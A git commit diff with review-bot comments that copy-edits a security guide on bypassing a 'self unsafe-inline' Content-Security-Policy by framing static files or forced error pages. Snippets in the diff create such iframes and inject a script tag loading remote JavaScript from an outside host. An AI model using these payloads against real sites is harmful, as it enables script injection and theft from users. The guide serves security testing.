Update csp-bypass-self-+-unsafe-inline-with-iframes.md

Taleb Qasem 2022-10-10 10:21:43 +06:00 committed by GitHub
parent 0083ed7909
commit 450d0b4463
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 5 deletions

@ -25,15 +25,15 @@ Content-Security-Policy: default-src self unsafe-inline;
Prohibits usage of any functions that execute code transmitted as a string. For example: `eval, setTimeout, setInterval` will all be blocked because of the setting `unsafe-eval`
Any content from external sources is also blocked, including images, css, websockets, and, especially, JS
Any content from external sources is also blocked, including images, CSS, WebSockets, and, especially, JS
## Via text & images
Modern browsers transform images and texts o HTML files to visualize them better (set background, center...).
Modern browsers transform images and texts into HTML files to visualize them better (set background, center, etc).
Therefore, if you **open an image or txt file** such as **favicon.ico** or **robots.txt** with an **`iframe`**, you will open it as HTML.
**These kind of pages usually doesn't have CSP headers and might not have X-Frame-Options**, so you can execute arbitrary JS from them:
**These kinds of pages usually don't have CSP headers and might not have X-Frame-Options**, so you can execute arbitrary JS from them:
```javascript
frame=document.createElement("iframe");
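Review bot: The unchanged context line at the top of this hunk, "will all be blocked because of the setting `unsafe-eval`", says the opposite of what the policy does. The header shown in the hunk context is `default-src self unsafe-inline` with no `unsafe-eval`, so the string-evaluating functions are blocked because that keyword is absent, not because it is set. Since this commit is already copy-editing the paragraph, reword it to something like "because `unsafe-eval` is not set". In the new line "center, etc)." the abbreviation also needs its period: "etc.)". It would help defenders if the "These kinds of pages" sentence added that the fix is to send the CSP and X-Frame-Options headers on static files such as favicon.ico and robots.txt as well.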
@ -46,7 +46,7 @@ window.frames[0].document.head.appendChild(script);
## Via Errors
Same as text files or images, **error responses usually doesn't have CSP headers and might not have X-Frame-Options**. So, you can force errors and load them inside an iframe:
Same as text files or images, **error responses usually don't have CSP headers and might not have X-Frame-Options**. So, you can force errors and load them inside an iframe:
```javascript
// Force nginx error
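Review bot: "Same as text files or images" in the changed sentence is still awkward as an opener; "As with text files or images, ..." reads correctly. The claim "usually don't have CSP headers" is also left unqualified: say that it applies to error pages the web server generates itself (the example that follows is labelled "Force nginx error"), and add a line telling readers to check whether their server sends the CSP and X-Frame-Options headers on error responses as well as on normal pages.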
@ -69,7 +69,7 @@ for(var i=0;i<5;i++){document.cookie=i+"="}
```
```javascript
// After any of the previous examples, you can execute JS in the iframe wih something like:
// After any of the previous examples, you can execute JS in the iframe with something like:
script=document.createElement('script');
script.src='//bo0om.ru/csp.js';
window.frames[0].document.head.appendChild(script);
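Review bot: The context line `script.src='//bo0om.ru/csp.js';` hardcodes a third-party host in a snippet readers will copy, so anyone who pastes it loads whatever that domain serves at the time. While touching this block, replace it with an obvious placeholder for a host the tester controls. `script=document.createElement('script');` also assigns to an undeclared variable, which creates an implicit global; `const script = document.createElement('script');` avoids that.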